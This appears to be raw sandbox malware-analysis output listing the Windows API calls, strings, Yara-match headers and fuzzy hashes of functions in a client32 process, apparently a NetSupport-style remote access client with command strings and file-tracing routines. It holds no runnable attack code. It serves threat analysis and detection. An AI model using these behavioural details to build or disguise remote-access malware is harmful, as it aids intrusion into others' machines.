                                                                                                                                        • LoadLibraryA.KERNEL32(NSMTRACE,?,1102D904,Function_000261F0,0237B878,?,?,?,00000100), ref: 111429F9
                                                                                                                                          • Part of subcall function 11141D10: GetModuleHandleA.KERNEL32(NSMTRACE,?), ref: 11141D2A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleLibraryLoadModule
                                                                                                                                        • String ID: NSMTRACE
                                                                                                                                        • API String ID: 4133054770-4175627554
                                                                                                                                        • Opcode ID: 433502aec3a65e000fb08c2d6388570534c842de87ba222d45da2a5652d1413f
                                                                                                                                        • Instruction ID: 309f5c028bc3f4bd42ffbc0ff88fedcb33e8baf52d9891cbdd74bffcbc1e2387
                                                                                                                                        • Opcode Fuzzy Hash: 433502aec3a65e000fb08c2d6388570534c842de87ba222d45da2a5652d1413f
                                                                                                                                        • Instruction Fuzzy Hash: 93D05E712417378BCB17AFED98953B8FBE8B70865D3340075D825D3A04EB70E0408B61
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(psapi.dll,?,688F8DC8), ref: 688F4F78
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                        • String ID: psapi.dll
                                                                                                                                        • API String ID: 1029625771-80456845
                                                                                                                                        • Opcode ID: 5e4fe5394ecc9a3ca551a34b62cbdf2ef91601da64694e7bcfb3562eb5c3209c
                                                                                                                                        • Instruction ID: f85251aeba0524b84f520908e2272b0cd57630e1c57185c779d958a1e27a7866
                                                                                                                                        • Opcode Fuzzy Hash: 5e4fe5394ecc9a3ca551a34b62cbdf2ef91601da64694e7bcfb3562eb5c3209c
                                                                                                                                        • Instruction Fuzzy Hash: 2DE001B1901B208F83B0CF3AA90464ABEF0BB086513118A2E909EC3A10E330E584CF80
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(psapi.dll), ref: 110259A8
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                        • String ID: psapi.dll
                                                                                                                                        • API String ID: 1029625771-80456845
                                                                                                                                        • Opcode ID: dad11223205508537e44fd2c16bfa07601dbeeaf6f3e83892d3386c1115941cb
                                                                                                                                        • Instruction ID: e7d689bb3e0256121f65424e75b73c3f9b38c7483ec2d975ead7d22227fa1e2d
                                                                                                                                        • Opcode Fuzzy Hash: dad11223205508537e44fd2c16bfa07601dbeeaf6f3e83892d3386c1115941cb
                                                                                                                                        • Instruction Fuzzy Hash: 7DE009B1A01B118FC3B0CF3A9544646BAF0BB186103118A3ED0AEC3A00E330A5448F90
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(nslsp.dll), ref: 1101516E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                        • String ID: nslsp.dll
                                                                                                                                        • API String ID: 1029625771-3933918195
                                                                                                                                        • Opcode ID: 3b59623a909b284854b1b3af36d82a4f2bbb95fba0a7c60f0ac8dd87b39ed554
                                                                                                                                        • Instruction ID: 0f85fd80076d2b40817f9a73906c67b3183ec9e0361306ecdf77c2e20fb6d995
                                                                                                                                        • Opcode Fuzzy Hash: 3b59623a909b284854b1b3af36d82a4f2bbb95fba0a7c60f0ac8dd87b39ed554
                                                                                                                                        • Instruction Fuzzy Hash: 9AC092B57022368FE3645F98AC585C6FBE4EB09612351886EE5B6D3704E6F09C408BE2
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 11073ECF
                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,0000000B,?), ref: 11073F39
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeLibrary_memset
                                                                                                                                        • String ID:
                                                                                                                                        APIs
                                                                                                                                        • ioctlsocket.WSOCK32(976C34B3,4004667F,00000000,-000397EB), ref: 688F5D1F
                                                                                                                                        • select.WSOCK32(00000001,?,00000000,?,00000000,976C34B3,4004667F,00000000,-000397EB), ref: 688F5D62
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ioctlsocketselect
                                                                                                                                        • String ID:
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _fgets_strpbrk
                                                                                                                                        • String ID:
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 1108752F
                                                                                                                                        • InitializeCriticalSection.KERNEL32(?,?,1117CF74,?), ref: 110875A0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalInitializeSection_memset
                                                                                                                                        • String ID:
                                                                                                                                        APIs
                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11140AD1
                                                                                                                                        • ExtractIconExA.SHELL32(?,00000000,00060153,00090289,00000001), ref: 11140B08
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExtractFileIconModuleName
                                                                                                                                        • String ID:
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 11165ABF: __getptd_noexit.LIBCMT ref: 11165ABF
                                                                                                                                        • __lock_file.LIBCMT ref: 1116057C
                                                                                                                                        • __fclose_nolock.LIBCMT ref: 11160587
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __fclose_nolock__getptd_noexit__lock_file
                                                                                                                                        • String ID:
                                                                                                                                        APIs
                                                                                                                                        • GetTickCount.KERNEL32 ref: 68906C26
                                                                                                                                        • Sleep.KERNEL32(00000064), ref: 68906C5B
                                                                                                                                          • Part of subcall function 68906940: GetTickCount.KERNEL32 ref: 68906950
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        APIs
                                                                                                                                        • WSACancelBlockingCall.WSOCK32 ref: 688F63A9
                                                                                                                                        • Sleep.KERNEL32(00000032), ref: 688F63B3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 11141430: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,76947310), ref: 11141457
                                                                                                                                          • Part of subcall function 1116076B: __fsopen.LIBCMT ref: 11160778
                                                                                                                                        • GetLastError.KERNEL32(?,0237B878,000000FF,?), ref: 11141545
                                                                                                                                        • Sleep.KERNEL32(000000C8,?,?,?,?,?,?,0237B878,000000FF,?), ref: 11141555
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        APIs
                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 11010A34
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        APIs
                                                                                                                                        • RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,?,76938400,?,?,111417CF,00000000,CSDVersion,00000000,00000000,?), ref: 1113F690
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        APIs
                                                                                                                                        • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000048,?,1117CF74), ref: 110F876D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InformationToken
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4114910276-0
                                                                                                                                        • Opcode ID: 3ed54ede1b3f10cca51033c0e31936367da5c7eb08a16c35f026113f9e1de554
                                                                                                                                        • Instruction ID: 4286fe34f75cea7b88237b7f19c57be592dd9146774f55c5736f82da2c6cd1b6
                                                                                                                                        • Opcode Fuzzy Hash: 3ed54ede1b3f10cca51033c0e31936367da5c7eb08a16c35f026113f9e1de554
                                                                                                                                        • Instruction Fuzzy Hash: 9A118A71E0022D9BDB51CBA8DC557EEB7E8AB49304F0040E9E909D7340DB70AE448B91
                                                                                                                                        APIs
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000008,68916F16,00000000,?,6891D40B,00000001,68916F16,00000000,00000000,00000000,?,68916F16,00000001,00000214), ref: 6891A0C5
                                                                                                                                          • Part of subcall function 689160F9: __getptd_noexit.LIBCMT ref: 689160F9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeap__getptd_noexit
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 328603210-0
                                                                                                                                        • Opcode ID: 5bcd742a4fc87988e3fddd6e8cfa80cd78d0e0d900bb11ff8b1626e687896c97
                                                                                                                                        • Instruction ID: 13ead169d65073c98a5063470e4da0243f6fc40e165f460e5c097f55247d8bd0
                                                                                                                                        • Opcode Fuzzy Hash: 5bcd742a4fc87988e3fddd6e8cfa80cd78d0e0d900bb11ff8b1626e687896c97
                                                                                                                                        • Instruction Fuzzy Hash: D001B13530D21A9FFB258E25CC14B6B37D8AB82B68F404529E8B7EB180DB75DC04C641
                                                                                                                                        APIs
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000008,110B7069,00000000,?,111665A4,?,110B7069,00000000,00000000,00000000,?,11167F37,00000001,00000214,?,110B7069), ref: 1116C979
                                                                                                                                          • Part of subcall function 11165ABF: __getptd_noexit.LIBCMT ref: 11165ABF
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeap__getptd_noexit
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 328603210-0
                                                                                                                                        • Opcode ID: 2c2584ae5d3c2f1a4e30704cb69b8cb8ac2400eb86a89467f06266894a6be336
                                                                                                                                        • Instruction ID: 4dc312edc878e3fc85dbd7a4fe26ae7c38801a5f560f23fe2cfbf25c3476fc95
                                                                                                                                        • Opcode Fuzzy Hash: 2c2584ae5d3c2f1a4e30704cb69b8cb8ac2400eb86a89467f06266894a6be336
                                                                                                                                        • Instruction Fuzzy Hash: 8A01D8317012669BFB168F66CD44B6BB79DAF81764F01452AE815CB2D0FBF1D820C780
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __waccess_s
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4272103461-0
                                                                                                                                        • Opcode ID: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                                                                        • Instruction ID: 5c2e7bbd61f30f1aea2da67b167f4c2082f9d237e02e17c26463379e16f3f813
                                                                                                                                        • Opcode Fuzzy Hash: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                                                                        • Instruction Fuzzy Hash: 1FC09B3745814D7F5F055DE5EC00C597F5DD6807747144115F91CC9490DE73E561D540
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4104443479-0
                                                                                                                                        • Opcode ID: 0063fd1bad2616aadce956affa811ddadc66d32b1d751c4eeb6fdd8492f4b122
                                                                                                                                        • Instruction ID: 149c94328b20b7684e4bcbd68a9865b5e5b17d9681ef1ea46cbc38f3ae43540f
                                                                                                                                        • Opcode Fuzzy Hash: 0063fd1bad2616aadce956affa811ddadc66d32b1d751c4eeb6fdd8492f4b122
                                                                                                                                        • Instruction Fuzzy Hash: 39B09BFFF42115295180655D7C44857EB4CE5D11BD3048537E11CC3501F111543483F0
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __fsopen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3646066109-0
                                                                                                                                        • Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                                                                        • Instruction ID: 7f7d982cc39844611e1edaafa4e80019d2d82fc8e8e4ac42b397e22a7b0e0c70
                                                                                                                                        • Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                                                                        • Instruction Fuzzy Hash: 0BC09B7644010C77DF111A83DC05E457F1D97C0674F144010FF1C1D1609573E971D685
                                                                                                                                        APIs
                                                                                                                                        • _NSMClient32@8.PCICL32(?,?,004010A8,00000000), ref: 0040100A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4582948100.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4582924850.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4582971225.0000000000403000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4582994339.0000000000404000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Client32@8
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 433899448-0
                                                                                                                                        • Opcode ID: a50aadacad94cde84f5700121068934964b21678fd47baf16d7368d0ca4f48de
                                                                                                                                        • Instruction ID: 101b8ead0f36abaf2e4a9e5d6dc85a2691bea7164fd7fac6f3abc260b8d29af7
                                                                                                                                        • Opcode Fuzzy Hash: a50aadacad94cde84f5700121068934964b21678fd47baf16d7368d0ca4f48de
                                                                                                                                        • Instruction Fuzzy Hash: 85B012B91043406FC104DB10C880D2B73A8BBC4300F008D0DB4D142181C734D800C632
                                                                                                                                        APIs
                                                                                                                                        • GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,nextfileindex,00000001,C:\Users\user\AppData\Roaming\Cisco\Support\pci.ini), ref: 688F5131
                                                                                                                                        • wsprintfA.USER32 ref: 688F514A
                                                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 688F5168
                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 688F5172
                                                                                                                                        • GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,maxfilesize,000003E8,C:\Users\user\AppData\Roaming\Cisco\Support\pci.ini), ref: 688F5191
                                                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 688F51B2
                                                                                                                                        • FlushFileBuffers.KERNEL32(00000000,?,688F9B16,00000001), ref: 688F51D8
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 688F51E4
                                                                                                                                        • wsprintfA.USER32 ref: 688F5225
                                                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 688F5243
                                                                                                                                        • __itow.LIBCMT ref: 688F5265
                                                                                                                                        • WritePrivateProfileStringA.KERNEL32(htctl.packet_tracing,nextfileindex,00000000), ref: 688F5278
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$PrivateProfile$Createwsprintf$BuffersCloseFlushHandlePointerSizeStringWrite__itow
                                                                                                                                        • String ID: %spacket%03d.trc$C:\Users\user\AppData\Roaming\Cisco\Support\$C:\Users\user\AppData\Roaming\Cisco\Support\pci.ini$htctl.packet_tracing$maxfilesize$nextfileindex
                                                                                                                                        • API String ID: 2516244645-849037079
                                                                                                                                        • Opcode ID: a043b79e79d67d9c6b0163705b1019e1413dda2ca4bc4a2e06249cc330a3e2d9
                                                                                                                                        • Instruction ID: e352db2684677d0a56479dbdbd5562238a9aa5f78862d4cb33033f7b1609c702
                                                                                                                                        • Opcode Fuzzy Hash: a043b79e79d67d9c6b0163705b1019e1413dda2ca4bc4a2e06249cc330a3e2d9
                                                                                                                                        • Instruction Fuzzy Hash: 44418D70A84328BFEB74DA64DC46F9E37E9A78A704F804554F605FB680DB75F9008B64
                                                                                                                                        APIs
                                                                                                                                        • GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,nextfileindex,00000001,C:\Users\user\AppData\Roaming\Cisco\Support\pci.ini), ref: 688F5131
                                                                                                                                        • wsprintfA.USER32 ref: 688F514A
                                                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 688F5168
                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 688F5172
                                                                                                                                        • GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,maxfilesize,000003E8,C:\Users\user\AppData\Roaming\Cisco\Support\pci.ini), ref: 688F5191
                                                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 688F51B2
                                                                                                                                        • FlushFileBuffers.KERNEL32(00000000,?,688F9B16,00000001), ref: 688F51D8
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 688F51E4
                                                                                                                                        • wsprintfA.USER32 ref: 688F5225
                                                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 688F5243
                                                                                                                                        • __itow.LIBCMT ref: 688F5265
                                                                                                                                        • WritePrivateProfileStringA.KERNEL32(htctl.packet_tracing,nextfileindex,00000000), ref: 688F5278
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$PrivateProfile$Createwsprintf$BuffersCloseFlushHandlePointerSizeStringWrite__itow
                                                                                                                                        • String ID: %spacket%03d.trc$C:\Users\user\AppData\Roaming\Cisco\Support\$C:\Users\user\AppData\Roaming\Cisco\Support\pci.ini$htctl.packet_tracing$maxfilesize$nextfileindex
                                                                                                                                        • API String ID: 2516244645-849037079
                                                                                                                                        • Opcode ID: aaaf09dac8ea1808ab479aacf8a34c28b7bfd1f88a7d97aa9d022cb6bb5e94a2
                                                                                                                                        • Instruction ID: 3d25ca29c068f10323de1ee8016fe955f9b234f36dfe57e5d43275f1567cd885
                                                                                                                                        • Opcode Fuzzy Hash: aaaf09dac8ea1808ab479aacf8a34c28b7bfd1f88a7d97aa9d022cb6bb5e94a2
                                                                                                                                        • Instruction Fuzzy Hash: 9F31BA70A84328BFEB74DB64DC46F9E37E9A78A704F804554FA05BA6C0DB75E9008B60
                                                                                                                                        APIs
                                                                                                                                        • SetLastError.KERNEL32(00000057), ref: 68904F6D
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898), ref: 68904FE9
                                                                                                                                        • LeaveCriticalSection.KERNEL32 ref: 68905002
                                                                                                                                        • _free.LIBCMT ref: 68905086
                                                                                                                                        • _free.LIBCMT ref: 689050BA
                                                                                                                                        • GetTickCount.KERNEL32 ref: 689050CB
                                                                                                                                        • GetTickCount.KERNEL32 ref: 689050E0
                                                                                                                                        • Sleep.KERNEL32(00000014,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 689050F2
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 68905108
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 68905135
                                                                                                                                        • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6890513F
                                                                                                                                        • SetLastError.KERNEL32(?), ref: 68905154
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$ErrorLast$CountEnterLeaveTick_free$Sleep
                                                                                                                                        • String ID: CMD=GETFILEINFO$GSK=%s$Gateway_Gsk$LINK=%s
                                                                                                                                        • API String ID: 619989478-944126313
                                                                                                                                        • Opcode ID: 44f4d34050c6c4bf5eb336c4a403bd7c29bbc64c574688c316df1a1e4fc17ce8
                                                                                                                                        • Instruction ID: 439c0559de4260e62c29eb34fac7d28ca689a461fb7681a623777def397ad98b
                                                                                                                                        • Opcode Fuzzy Hash: 44f4d34050c6c4bf5eb336c4a403bd7c29bbc64c574688c316df1a1e4fc17ce8
                                                                                                                                        • Instruction Fuzzy Hash: 3061B475E08218EFDB20DFA8C948BEE77B8EF49319F904569E515E7240D731EA04CBA1
                                                                                                                                        APIs
                                                                                                                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,00000000,00000000,?), ref: 1112714B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ManagerOpen
                                                                                                                                        • String ID: EnumServices returned %d$QueryServiceConfig2W$advapi32.dll
                                                                                                                                        • API String ID: 1889721586-3267302290
                                                                                                                                        APIs
                                                                                                                                        • GetMenu.USER32(?), ref: 11025347
                                                                                                                                        • DrawMenuBar.USER32(?), ref: 1102535E
                                                                                                                                        • GetMenu.USER32(?), ref: 110253B3
                                                                                                                                        • DeleteMenu.USER32(00000000,00000001,00000400), ref: 110253C1
                                                                                                                                        • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 1102531E
                                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                        • UpdateWindow.USER32(?), ref: 11025407
                                                                                                                                        • IsIconic.USER32(?), ref: 1102541A
                                                                                                                                        • SetTimer.USER32(00000000,00000000,000003E8,00000000), ref: 1102543A
                                                                                                                                        • KillTimer.USER32(00000000,00000000,00000080,00000002), ref: 110254A0
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Menu$TimerWindow$DeleteDrawErrorExitIconicKillLastMessageProcessUpdatewsprintf
                                                                                                                                        • String ID: ..\ctl32\chatw.cpp$Chat$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                        • API String ID: 3085788722-363603473
                                                                                                                                        APIs
                                                                                                                                        • SetWindowLongA.USER32(?,000000FC,?), ref: 1115B1C6
                                                                                                                                        • RemovePropA.USER32(?), ref: 1115B1E5
                                                                                                                                        • RemovePropA.USER32(?), ref: 1115B1F4
                                                                                                                                        • RemovePropA.USER32(?,00000000), ref: 1115B203
                                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
